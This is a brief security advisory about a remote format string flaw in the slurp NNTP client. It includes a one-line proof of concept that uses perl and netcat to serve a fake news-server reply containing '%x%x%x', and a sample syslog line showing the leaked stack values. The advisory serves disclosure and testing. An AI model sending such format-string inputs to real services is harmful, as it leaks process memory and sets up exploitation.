|
Slurp SysLog Remote Format String Vulnerability
This proof of concept was made available by zillion <zillion@snosoft.com>: To find out you have a vulnerable slurp, connect to this: perl -e 'print "200 Hello brother \n666 %x%x%x\n'" | nc -l -p 119 Then check /var/log/messages for something like: Jun 5 05:10:22 yada slurp[39926]: do_newnews: NNTP protocol error: got '666 bfbff4f8804bc1bbfbff51c' |
|
 Privacy Statement |
